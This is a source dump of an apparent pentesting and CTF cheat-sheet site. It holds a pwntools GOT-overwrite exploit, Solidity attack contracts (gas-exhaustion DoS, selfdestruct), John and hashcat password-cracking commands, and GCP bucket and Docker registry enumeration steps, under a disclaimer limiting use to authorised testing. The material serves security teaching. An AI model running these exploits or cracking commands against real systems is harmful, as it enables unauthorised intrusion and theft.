https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/icon_bg.png -------------------------------------------------------------------------------- /src/assets/img/kofi_cropped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/kofi_cropped.png -------------------------------------------------------------------------------- /src/assets/img/kofi_s.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/kofi_s.png -------------------------------------------------------------------------------- /src/assets/img/malware-notes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/malware-notes.png -------------------------------------------------------------------------------- /src/assets/img/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/screenshot.png -------------------------------------------------------------------------------- /src/assets/img/security-links.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/security-links.png -------------------------------------------------------------------------------- /src/assets/img/theoffseclibrary.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/theoffseclibrary.png -------------------------------------------------------------------------------- /src/assets/img/title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/title.png -------------------------------------------------------------------------------- /src/assets/img/twitter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/twitter.png -------------------------------------------------------------------------------- /src/assets/img/x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/x.png -------------------------------------------------------------------------------- /src/assets/img/x.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /src/assets/js/exploit.js: -------------------------------------------------------------------------------- 1 | document.addEventListener('DOMContentLoaded', () => { 2 | scrollToRelatedPage(); 3 | 4 | // Scroll to the current exploit in exploits related. 5 | function scrollToRelatedPage() { 6 | const scrollTargetElem = document.getElementById('scroll-target'); 7 | if (scrollTargetElem) { 8 | const leftSideInner = document.getElementById('exploit-leftside-inner'); 9 | leftSideInner.scroll(0, scrollTargetElem.offsetTop - 300); 10 | } 11 | } 12 | }); 13 | -------------------------------------------------------------------------------- /src/assets/js/hamburger.js: -------------------------------------------------------------------------------- 1 | document.querySelector('.hamburger')?.addEventListener('click', () => { 2 | const navLinksElem = document.querySelector('.nav-links'); 3 | const hamburgerElem = document.querySelector('.hamburger'); 4 | const linesElem = document.querySelector('.hamburger .lines'); 5 | const lineCrossElem = document.querySelector('.hamburger .line-cross'); 6 | if (navLinksElem && hamburgerElem && linesElem && lineCrossElem) { 7 | navLinksElem.classList.toggle('hidden'); 8 | navLinksElem.classList.toggle('nav-links-hamburger'); 9 | linesElem.classList.toggle('hidden'); 10 | lineCrossElem.classList.toggle('hidden'); 11 | } 12 | }); -------------------------------------------------------------------------------- /src/disclaimer.vto: -------------------------------------------------------------------------------- 1 | --- 2 | layout: layouts/base.vto 3 | bodyClass: body-disclaimer 4 | --- 5 | 6 |
7 |

Disclaimer

8 |
9 |

10 | Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized. 11 | This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally. 12 | Please use the contents at your own risk. 13 |

14 |

15 | The contents are not original, but based on the information on the internet, the author actually tried and functioned. 16 | Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new. 17 |

18 |

19 | I'm not a security expert, just an enthusiast, so the contents written are not necessarily accurate. 20 |

21 |
22 |
23 | 24 | -------------------------------------------------------------------------------- /src/exploit/_data.yml: -------------------------------------------------------------------------------- 1 | type: exploit 2 | layout: layouts/exploit.vto 3 | date: Git Last Modified -------------------------------------------------------------------------------- /src/exploit/audio/_data.yml: -------------------------------------------------------------------------------- 1 | category1: audio 2 | related_menus: 3 | - title: Audio 4 | id: others -------------------------------------------------------------------------------- /src/exploit/audio/sstv.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SSTV (Slow-scan Television) 3 | description: SSTV is a picture transmission method by amateur radio operators. We can extract pictures from audio files. 4 | tags: 5 | - Audio 6 | - Spectrogram 7 | refs: 8 | - https://oe5lxr.at/decode-sstv-with-mmsstv/ 9 | date: 2023-07-19 10 | draft: false 11 | --- 12 | 13 | ## Decode SSTV 14 | 15 | There are some online tools available as below. 16 | 17 | - **MMSSTV** (for Windows) 18 | - **QSSTV** (for Linux) 19 | - **[sstv](https://github.com/colaclanth/sstv)** (Command-line tool) -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/_data.yml: -------------------------------------------------------------------------------- 1 | category1: binary-exploitation 2 | related_menus: 3 | - title: Method 4 | id: method 5 | - title: Cheatsheet 6 | id: cheatsheet 7 | - title: Binary Exploitation 8 | id: others -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/cheatsheet/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cheatsheet -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/_data.yml: -------------------------------------------------------------------------------- 1 | category2: method -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/binary-exploitation-with-got.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Binary Exploitation with GOT 3 | description: GOT (Global Offset Table) is a section of a computer program’s memory used to enable computer program code compiled as an ELF file to run correctly. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-02-12 8 | draft: false 9 | --- 10 | 11 | ## GOT Overriding 12 | 13 | ```python 14 | from pwn import * 15 | 16 | context.update(arch="amd64", os="linux") 17 | 18 | filepath = "./example" 19 | 20 | elf = context.binary = ELF(filepath) 21 | 22 | p = process(filepath) # p = remote('example.com', '1337') 23 | 24 | p.clean() 25 | p.sendline() 26 | p.clean() 27 | 28 | payload = fmtstr_payload(10, {elf.got['puts'] : elf.sym['holidays']}) 29 | p.sendline(payload) 30 | p.interactive() 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/binary-exploitation-with-ret2plt.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Binary Exploitation with ret2plt 3 | description: 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-02-12 8 | draft: false 9 | --- 10 | 11 | No content yet. -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/binary-exploitation-with-time-guessing.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Binary Exploitation with Time Guessing 3 | description: 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-03-01 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | ./example 15 | 16 | Guess the number: 1111 17 | You losed. The correct answer is 1475693029 18 | 19 | Guess the number: 12345678 20 | You losed. The correct answer is 8246712747 21 | ``` 22 | 23 | If we find a binary that asks us to guess the correct time (or time-base number), we can bypass it using a Pipe in command line. 24 | 25 |
26 | 27 | ## Exploitation 28 | 29 | ```bash 30 | # tr -dc '0-9': Extract the correct number provided by the binary. 31 | echo 1234 | ./example | tr -dc '0-9' | ./example 32 | ``` 33 | 34 | The above payload inputs ‘1234’ at first, then the binary returns the correct number. **`tr`** command extracts this number and passes it the second execution of the binary. 35 | As the binary depends on the time, so we can bypass the program by passing the previous answer instantly. -------------------------------------------------------------------------------- /src/exploit/blockchain/_data.yaml: -------------------------------------------------------------------------------- 1 | category1: blockchain 2 | related_menus: 3 | - title: Smart Contract 4 | id: smart-contract 5 | - title: Others 6 | id: others -------------------------------------------------------------------------------- /src/exploit/blockchain/blockchain-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Blockchain Pentesting 3 | description: A type of Digital Ledger Technology (DLT) that consists of growing list of records, called blocks, that are securely linked together using cryptography. 4 | tags: 5 | - Blockchain 6 | - Web3 7 | refs: 8 | date: 2023-10-11 9 | draft: false 10 | --- 11 | 12 | ## Explore Transactions 13 | 14 | - [blockchain.com](https://www.blockchain.com/explorer) 15 | 16 | The most popular and trusted block explorer and crypto transaction search engine. 17 | 18 | - [Block Explorer](https://blockexplorer.com/) 19 | 20 | The Handshake Block Explorer. 21 | 22 | - [etherchain.org](https://www.etherchain.org/) 23 | 24 | The Ethereum blockchain explorer. 25 | 26 | - [OXT](https://oxt.me/) 27 | 28 | 29 |
30 | 31 | ## Explore Wallets 32 | 33 | - [Wallet Explorer](https://www.walletexplorer.com/) 34 | -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/_data.yaml: -------------------------------------------------------------------------------- 1 | category2: smart-contract -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-contarct-address-recovery.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Contract Address Recovery 3 | description: 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | - https://ethereum.stackexchange.com/questions/760/how-is-the-address-of-an-ethereum-contract-computed 9 | - https://blog.dixitaditya.com/ethernaut-level-17-recovery 10 | date: 2023-09-30 11 | draft: false 12 | --- 13 | 14 | ## Create a Contract for Recovery Address 15 | 16 | This contract can compute the contract address which has been lost. 17 | 18 | ```js 19 | // SPDX-License-Identifier: MIT 20 | pragma solidity ^0.8.0; 21 | 22 | contract ContractRecovery { 23 | 24 | constructor(address _creatorAddress) { 25 | address lostAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(_creatorAddress), bytes1(0x01)))))); 26 | // some code here ... 27 | } 28 | } 29 | ``` 30 | 31 | Another way is to use [Etherscan](https://etherscan.io/) transaction history. -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-conversion.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Conversion 3 | description: 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | - https://www.tutorialspoint.com/solidity/solidity_conversions.htm 9 | - https://coinsbench.com/12-privacy-ethernaut-explained-8ee480f303f2 10 | date: 2023-09-30 11 | draft: false 12 | --- 13 | 14 | ## Explicit Conversion 15 | 16 | When we cast a smaller type to a bigger type, there's no problem. However, when we cast a bigger type to a smaller type, data may be lost partially. 17 | 18 | ### Uint/Int 19 | 20 | ```js 21 | // uint32 -> uint16 22 | uint32 a = 0x12345678; 23 | uint16 b = uint16(a); // 0x5678 24 | 25 | // uint16 -> uint32 26 | uint16 a = 0x1234; 27 | uint32 b = uint32(a); // 0x00001234 28 | ``` 29 | 30 | ### Bytes 31 | 32 | ```js 33 | // bytes2 -> bytes1 34 | bytes2 a = 0x1234; 35 | bytes1 b = bytes1(a); // 0x12 36 | 37 | // bytes2 -> bytes4 38 | bytes2 a = 0x1234; 39 | bytes4 b = bytes4(a); // 0x12340000 40 | ``` -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-denial-of-service-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Denial of Service Attack 3 | description: We can denial the Solidity execution by consuming all gas using various ways. 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | - https://coinsbench.com/20-denial-ethernaut-explained-92bc3f7562ec 9 | date: 2023-09-30 10 | draft: false 11 | --- 12 | 13 | ## DoS with Assembly Invalid Function 14 | 15 | The `invalid()` opcode in in-line assembly consumes all the gas and causes Dos for the contract. 16 | 17 | ```js 18 | // SPDX-License-Identifier: MIT 19 | pragma solidity ^0.8.0; 20 | 21 | contract Victim { 22 | address public owner; 23 | uint public balance; 24 | 25 | function withdrawUser(address _address) { 26 | (bool success, ) = _address.call{value: balance}(""); 27 | // Some code ... 28 | } 29 | } 30 | 31 | contract Attack { 32 | Victim target; 33 | 34 | constructor(address _targetAddress) { 35 | target = Victim(_targetAddress); 36 | target.withdrawUser(address(this)); 37 | } 38 | 39 | fallback() payable external { 40 | assembly { 41 | invalid() 42 | } 43 | } 44 | } 45 | ``` -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-overflow-and-underflow.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Overflow & Underflow 3 | description: Solidity is vulnerable to overflow and underflow of uint variables on the version <0.8. 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | date: 2023-09-27 9 | draft: false 10 | --- 11 | 12 | ## Overflow 13 | 14 | ```js 15 | uint8 value = 255; 16 | value++; 17 | // Result: value = 0 18 | ``` 19 | 20 |
21 | 22 | ## Underflow 23 | 24 | ```js 25 | uint8 value = 0; 26 | value--; 27 | // Result: value = 255 28 | ``` -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-self-destruct-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Self Destruct Attack 3 | description: Solidity’s ‘selfdestruct’ function may be used to destruct a target contract and steal the balance by an attacker. 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | date: 2023-09-30 9 | draft: false 10 | --- 11 | 12 | ## Create a Malicious Contract for Destructing Contract 13 | 14 | ```js 15 | // SPDX-License-Identifier: MIT 16 | pragma solidity ^0.4.0; 17 | 18 | contract Attack { 19 | function attack(address _address) payable public { 20 | // the remaining Ether sent to _address when destructing 21 | selfdestruct(_address); 22 | } 23 | } 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-smart-contract-attack-methodology.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Smart Contract Attack Methodology 3 | description: When attacking target contract, we can create an attack contract which loads the target contract and abuse it. 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | date: 2023-09-30 9 | draft: false 10 | --- 11 | 12 | ## Create an Attack Contract 13 | 14 | ```js 15 | // SPDX-License-Identifier: MIT 16 | pragma solidity ^0.8.0; 17 | 18 | // Define interface for victim contract 19 | interface IVictim { 20 | // Set the Victim contract functions 21 | function example1() external; 22 | function example2(uint) external; 23 | } 24 | 25 | // Define Attack contract to compromise the victim contract 26 | contract Attack { 27 | IVictim public victim; 28 | 29 | constructor(address _victimAddress) { 30 | // Initialize Victim contract (interface) 31 | victim = IVictim(_victimAddress); 32 | } 33 | 34 | // Create a function to be used for attacking the victim contract 35 | function attack() public { 36 | victim.example1(); 37 | victim.example2(1); 38 | } 39 | } 40 | ``` -------------------------------------------------------------------------------- /src/exploit/cloud/_data.yml: -------------------------------------------------------------------------------- 1 | category1: cloud 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/cloud/gcp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: GCP (Google Cloud Platform) Pentesting 3 | description: 4 | tags: 5 | - Cloud 6 | refs: 7 | - https://pwnedlabs.io/labs/reveal-hidden-files-in-google-storage 8 | date: 2024-12-18 9 | draft: false 10 | --- 11 | 12 | ## Install Google Cloud CLI 13 | 14 | Before pentesting GCP, we need to install a dedicated CLI tool. See [the installation guide](https://cloud.google.com/sdk/docs/install) for details. 15 | After installed, login with your Google credential: 16 | 17 | ```bash 18 | gcloud auth login 19 | ``` 20 | 21 |
22 | 23 | ## Google Storage 24 | 25 | Google Storage allows users to store static files in the URL: `https://storage.googleapis.com//`. 26 | We can enumerate the target storage as below: 27 | 28 | ```bash 29 | # Enumerate accessible directories/files from outside. 30 | fuzz -u https://storage.googleapis.com//FUZZ -w wordlist.txt -fc 403 31 | 32 | # Display directories/files 33 | gsutil ls gs:///example/ 34 | 35 | # Download a file 36 | gsutil cp gs:///example.txt 37 | 38 | # Get information for the bucket 39 | gsutil stat gs:///index.html 40 | ``` -------------------------------------------------------------------------------- /src/exploit/container/_data.yml: -------------------------------------------------------------------------------- 1 | category1: container 2 | related_menus: 3 | - title: Docker 4 | id: docker 5 | - title: Kubernetes 6 | id: kubernetes 7 | - title: Others 8 | id: others -------------------------------------------------------------------------------- /src/exploit/container/docker/_data.yml: -------------------------------------------------------------------------------- 1 | category2: docker -------------------------------------------------------------------------------- /src/exploit/container/docker/docker-registry-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Docker Registry Pentesting 3 | description: Docker Registry is a steteless, highly scalable server side application that stores and lets you distribute Docker images. A default port is 5000. 4 | tags: 5 | - Container 6 | refs: 7 | - https://tbhaxor.com/exploiting-insecure-docker-registry/ 8 | date: 2024-02-08 9 | draft: false 10 | --- 11 | 12 | ## Endpoints 13 | 14 | ```bash 15 | /v2/_catalog 16 | /v2//tags/list 17 | # We can download the manifest given tag. 18 | /v2//manifests/ 19 | ``` 20 | 21 |
22 | 23 | ## Extract Layers 24 | 25 | If we download the manifest with the above, see the content and blobsums (sha256:abcd...) in fsLayers. 26 | 27 | ```bash 28 | curl -so 1.tar https://example.com:5000/v2//blobs/sha256:abcd... 29 | tar -xvf 1.tar 30 | ``` 31 | 32 | After extracting tar files, investigate files or directories to find the sensitive information. -------------------------------------------------------------------------------- /src/exploit/container/kubernetes/_data.yml: -------------------------------------------------------------------------------- 1 | category2: kubernetes -------------------------------------------------------------------------------- /src/exploit/cryptography/_data.yml: -------------------------------------------------------------------------------- 1 | category1: cryptography 2 | related_menus: 3 | - title: Algorithm 4 | id: algorithm 5 | - title: Key Derivation Function 6 | id: key-derivation-function 7 | - title: Tool 8 | id: tool 9 | - title: Math 10 | id: math 11 | - title: Bit Wise Operation 12 | id: bit-wise-operation 13 | - title: Conversion 14 | id: conversion -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/_data.yml: -------------------------------------------------------------------------------- 1 | category2: algorithm -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/atbash-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Atbash Cipher 3 | description: Atbash Cipher is a monoalphabetic substitution cipher originally used to encrypt the Hebrew alphabet. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-10 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[Atbach Cipher Tool](https://www.boxentriq.com/code-breaking/atbash-cipher)** 14 | 15 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/caesar-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Caesar Cipher 3 | description: Caesar Cipher is one of the simplest and most widely konwn encryption techniques. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-10 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[Caesar Cipher Encoder/Decoder](https://www.dcode.fr/caesar-cipher)** 14 | 15 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/camellia-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Camellia Cipher 3 | description: Camellia is a symmetric key block cipher with a block size of 128 bits and key sizes of 128, 192 and 256 bits. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-21 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | ```bash 14 | gpg --decrypt encrypted.gpg 15 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/ecc.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ECC (Elliptic Curve Cryptography) 3 | description: Elliptic Curve Cryptography is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields. 4 | tags: 5 | - Cryptography 6 | refs: 7 | - https://en.wikipedia.org/wiki/Elliptic-curve_cryptography 8 | date: 2023-09-09 9 | draft: false 10 | --- 11 | 12 | *This article has few content yet. 13 | 14 | ## Formula 15 | 16 | ```python 17 | Y**2 = X**3 + a*X + b 18 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/ecdsa.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ECDSA (Elliptic Curve Digital Signature Algorithm) 3 | description: ECDSA offers a variant of the DSA which uses elliptic curve cryptography. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-09-09 8 | draft: false 9 | --- 10 | 11 | ## ECDSA in Python 12 | 13 | [python-ecdsa](https://github.com/tlsfuzzer/python-ecdsa) can be used for ECDSA. 14 | 15 | ```bash 16 | pip install ecdsa 17 | ``` 18 | 19 | ### Verifying 20 | 21 | ```python 22 | from ecdsa import SigningKey, NIST384p 23 | 24 | sk = SigningKey.generate(curve=NIST384p) 25 | vk = sk.verifying_key 26 | signature = sk.sign(b"message") 27 | print(vk.verify(signature, b"message")) 28 | ``` 29 | 30 | ### Generating SigningKey 31 | 32 | ```python 33 | from ecdsa import SigningKey, NIST384p 34 | 35 | sk = SigningKey.generate(curve=NIST384p) 36 | sk_string = sk.to_string() 37 | print(sk_string.hex()) 38 | 39 | sk2 = SigningKey.from_string(sk_string, curve=NIST384p) 40 | print(sk2.to_string().hex()) 41 | ``` 42 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/fernet.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Fernet 3 | description: Fernet is a symmetric encryption cryptography. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-03-07 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | There are many online tools such as… 14 | 15 | - [https://asecuritysite.com/tokens/ferdecode](https://asecuritysite.com/tokens/ferdecode) 16 | - [https://8gwifi.org/fernet.jsp](https://8gwifi.org/fernet.jsp) 17 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/hmac.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: HMAC 3 | description: An HMAC is a specific type of message authentication code involving a cryptographic hash function and a secret cryptographic key. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-10 8 | draft: false 9 | --- 10 | 11 | ## Install HMAC Commands 12 | 13 | If you don’t have `hmac256` command, you need to install the package. 14 | 15 | ```bash 16 | # In debian 17 | sudo apt install libgcrypt20-dev 18 | ``` 19 | 20 |
21 | 22 | ## Decrypt 23 | 24 | ```bash 25 | # HMAC 26 | hmac256 example.txt 27 | 28 | # HMAC-SHA256 29 | sha256hmac example.txt --key 30 | 31 | # HMAC-SHA384 32 | sha384hmac example.txt --key 33 | 34 | # HMAC-SHA512 35 | sha512hmac example.txt --key 36 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/kdbx-files.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: KDBX Files 3 | description: A KDBX file is a password database created by KeePass Password Safe. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2024-10-25 8 | draft: false 9 | --- 10 | 11 | ## Open KDBX File 12 | 13 | If KeePass software does not exist in our system, run the following command. 14 | 15 | ```bash 16 | sudo apt install keepassx 17 | # or 18 | sudo apt install keepass2 19 | ``` 20 | 21 | To open **KeePass*, run the following command. 22 | 23 | ```sh 24 | keepassx 25 | # or 26 | keepass2 27 | ``` 28 | 29 | ### Copy Password 30 | 31 | Right-click on the password value then click **Copy Password**. 32 | 33 |
34 | 35 | ## Crack KDBX Password 36 | 37 | When opening KDBX file in KeePass if you’re asked the Master Key, you need to crack the password of the KDBX file. **John The Ripper** can be used to crack the password. 38 | 39 | ### 1. Convert to Hash 40 | 41 | ```sh 42 | keepass2john example.kdbx > hash.txt 43 | ``` 44 | 45 | ### 2. Crack the Hash 46 | 47 | ```sh 48 | john --wordlist=wordlist.txt hash.txt 49 | # or 50 | hashcat -m 13400 -a 0 hash.txt wordlist.txt 51 | ``` 52 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/kerberos-tgt-cracking.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Kerberos TGT Cracking 3 | description: The Kerberos Ticket-Granting Ticket (TGT) is created by the Kerberos authentication. Users can access to the network using these tickets. These are often saved as `.kirbi` extension and we may be able to crack them. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-11-11 8 | draft: false 9 | --- 10 | 11 | ## Crack TGT 12 | 13 | First convert the TGT to the hash which can be cracked by **John The Ripper**. 14 | 15 | ```sh 16 | kirbi2john tgt.kirbi > hash.txt 17 | # or 18 | python2 /usr/share/john/kirbi2john.py tgt.kirbi > hash.txt 19 | ``` 20 | 21 | Then crack. 22 | 23 | ```sh 24 | john --wordlist=wordlist.txt hash.txt 25 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/length-extension-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Length Extension Attack 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | - https://en.wikipedia.org/wiki/Length_extension_attack 8 | - https://github.com/iagox86/hash_extender 9 | date: 2023-07-28 10 | draft: false 11 | --- 12 | 13 | ## Exploitation 14 | 15 | We can exploit the vulnerability with [hash_extender](https://github.com/iagox86/hash_extender). 16 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/md4-md5.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: MD4, MD5 3 | description: MD4 and MD5 (message-digest) is a widely used hash function producing a 128-bit hash value. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-01-05 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[MD5 Center](https://md5.gromweb.com/)** 14 | - **[CrackStation](https://crackstation.net/)** 15 | - **[Hashes.com](https://hashes.com/en/decrypt/hash)** 16 | 17 |
18 | 19 | ## Decrypt 20 | 21 | ### MD4 22 | 23 | Put the md4 hash into the file. 24 | 25 | ```sh 26 | echo -n '' > hash.txt 27 | ``` 28 | 29 | Then crack it. 30 | 31 | ```sh 32 | john --format=raw-md4 --wordlist=wordlist.txt hash.txt 33 | # or 34 | hashcat -m 900 -a 0 hash.txt wordlist.txt 35 | ``` 36 | 37 | ### MD5 38 | 39 | Put the md5 hash into the file. 40 | 41 | ```sh 42 | echo -n '' > hash.txt 43 | ``` 44 | 45 | Then crack it. 46 | 47 | ```sh 48 | john --format=raw-md5 --wordlist=wordlist.txt hash.txt 49 | # or 50 | hashcat -m 0 -a 0 hash.txt wordlist.txt 51 | ``` 52 | 53 |
54 | 55 | ## Encrypt 56 | 57 | ### MD4 58 | 59 | No contents yet 60 | 61 | ### MD5 62 | 63 | ```sh 64 | echo -n 'hello' | md5sum 65 | md5sum sample.txt 66 | ``` 67 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/multi-tap-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Multi-Tap Cipher 3 | description: Multi-Tap refers to a text entry system for mobile phones. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-21 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[Multitap Decoder](https://www.dcode.fr/multitap-abc-cipher)** 14 | 15 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/pem.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PEM (Privacy Enhanced Mail) 3 | description: PEM uses RSA encryption. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | First of all, you need to format the PEM file to make the John to recognize it. 14 | 15 | ```sh 16 | pem2john example.pem > hash.txt 17 | ``` 18 | 19 | Crack the hash. 20 | 21 | ```sh 22 | john --wordlist=wordlist.txt hash.txt 23 | ``` 24 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/pgp.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PGP (Pretty Good Privacy) 3 | description: PGP is an encryption program that provides cryptographic privacy and authentication for data communication. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-20 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | First off, you need to format the private key to make the John to recognize it. 14 | 15 | ```sh 16 | gpg2john private.key > hash.txt 17 | ``` 18 | 19 | Crack the passphrase using John the Ripper. 20 | 21 | ```sh 22 | john --wordlist=wordlist.txt hash.txt 23 | ``` 24 | 25 |
26 | 27 | ## Decode Public Key 28 | 29 | There are some online tools. 30 | 31 | - **[PGPDump](https://8gwifi.org/pgpdump.jsp)** -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/pkcs.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PKCS (Public-Key Cryptography Standards) 3 | description: PKCS are a group of public-key cryptography standards. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | ### PKCS#12 14 | 15 | First of all, you need to format the PKCS file to make the John to recognize it. 16 | 17 | ```sh 18 | pfx2john example.pfx > hash.txt 19 | ``` 20 | 21 | Crack the password using the formatted text. 22 | 23 | ```sh 24 | john --wordlist=wordlist.txt hash.txt 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/rar.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: RAR (Roshal Archive) 3 | description: RAR is a proprietary archive file format that supports data compression, error correction and file spanning. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-22 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | First of all, you need to format the RAR file to make the John to recognize it. 14 | 15 | ```sh 16 | rar2john example.rar > hash.txt 17 | ``` 18 | 19 | Crack the password using the formatted text. 20 | 21 | ```sh 22 | john --wordlist=wordlist.txt hash.txt 23 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/ripemd.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: RIPEMD 3 | description: RIPEMD (RIPE Message Digest) is a family of cryptographic hash function 